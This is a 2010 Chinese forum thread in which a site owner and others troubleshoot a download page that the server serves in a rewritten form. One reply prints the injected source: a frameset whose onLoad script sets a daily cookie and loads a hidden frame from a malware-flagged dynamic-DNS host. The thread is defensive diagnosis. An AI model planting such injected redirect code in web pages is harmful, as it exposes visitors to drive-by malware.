发新话题
打印

服务器被入侵了吗?

服务器被入侵了吗?

今天更新了Download列表但是发现不论如何通过FTP上传覆盖,在浏览器浏览时源代码都会被改写。
现在Download.htm已经是被改写的页面了,各位不要去点击

是木马么?

TOP

http://www.srw00.com/hopegundam/Download.htm

这个页面?

源文件被改成了这样:
<html>
<head>
</head>
<script>
function showme()
{
var CK=document.cookie;
var sa=CK.indexOf("CK");
if(sa!=-1){}else{var EP=new Date();
EP.setTime(EP.getTime()+24*60*60*1000);
document.cookie="CK=test;expires="+EP.toGMTString();
self.hi.location="http://zleiuk20.3322.org:89/jav/lz002.htm";}
}
</script>
<frameset rows="100%,*" onLoad="showme()">
<frame name="hello" src="/hopegundam/Download.htm?UpdatedPage=aGlqYWNr">
<frame name="hi" src="">
</frameset>
</html>

TOP

一大坨的table,一行tr对应一个下载表
上传一个最新的Download.htm

[ 本帖最后由 希望高达 于 2010-5-23 22:25 编辑 ]
附件: 您所在的用户组无法下载或查看附件

TOP

从FTP上看文件大小没变,但是从浏览器访问页面,源代码就成了这个4kb的奇怪文件
你那里从浏览器上看Download.htm正常吗?

TOP

你那边恢复了?我这边还没恢复啊……
你多刷新几次看看?
我怀疑服务器的IIS不正常……

TOP

http://zleiuk20.3322.org:89/jav/lz002.htm

这个页面,使用Chrome连接过去的时候会提示该站点已被Google认定为“可能包含恶意软件”页面

以前一直用这个统计站点的?会不会是这个统计站点的js脚本被人下了药?

TOP

发新话题